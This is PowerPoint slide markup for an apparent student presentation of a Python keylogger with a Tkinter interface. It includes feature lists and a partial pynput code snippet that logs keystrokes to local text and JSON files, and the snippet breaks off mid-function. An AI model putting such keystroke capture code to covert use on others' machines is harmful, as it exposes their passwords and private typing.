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8" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="273"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27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2065254"/>
            <a:ext cx="9437988" cy="509114"/>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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tarak Sri Chandrahas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="15" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lakkakula</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="15" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="287926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6A2F1630-803C-10D0-DEC2-D430755F9C30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="1676400"/>
            <a:ext cx="7010400" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Key Features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Simplicity</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Easy Setup and Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Designed for easy installation and operation, even for non-technical users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Real-time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Immediate Insights</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Captures and logs keystrokes in real-time for prompt data analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Comprehensive Logs</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Detailed Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Supports both JSON and text formats, providing detailed and flexible log outputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>User-Friendly Interface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Intuitive GUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Built with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, the interface is designed to be simple and easy to navigate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Advantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Efficiency</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Lightweight Performance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Operates without significantly impacting system performance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="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956B4F59-714C-0945-3E73-53471E3202D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2518656" y="1616093"/>
            <a:ext cx="7696200" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Real-time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Instant Insights</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Instantly logs and displays keystrokes as they happen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Customizable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Flexible Settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Offers options to customize the logging format and frequency to suit your needs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Lightweight</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Minimal System Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Designed to have minimal impact on system resources, ensuring efficient performance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Secure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Data Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Logs data securely with encryption options to protect sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Demonstration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Live Demo</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Real-time Performance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Showcases the keylogger in action, capturing and displaying keystrokes instantly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>User Experience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Ease of Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: Highlights the intuitive interface and user-friendly experience, making it accessible for all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3" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63F527B0-0F47-77C4-9E3C-17320870B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676400"/>
            <a:ext cx="4810125" cy="3057525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41928F2A-25CC-C2C0-631C-2C1BDC8EF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2057400"/>
            <a:ext cx="3581400" cy="2311631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{614223B3-4638-13A9-3CFE-A857E47CAE18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="4733925"/>
            <a:ext cx="3352800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    Software Keylogger diagram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2392610-F6E4-E17E-B626-57A83A918789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7620000" y="4733925"/>
            <a:ext cx="3048000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      Hardware Keylogger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78F7E-2495-3458-D782-33DEE0712AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508819" y="19665"/>
            <a:ext cx="4724400" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Snippet:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495D6DC5-7FD9-BBEE-2594-EA4396050AFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="422111"/>
            <a:ext cx="5562600" cy="6555641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys = ""</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generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(key)</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generate_json_file</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</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).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</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on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
            </a:endParaRP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on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
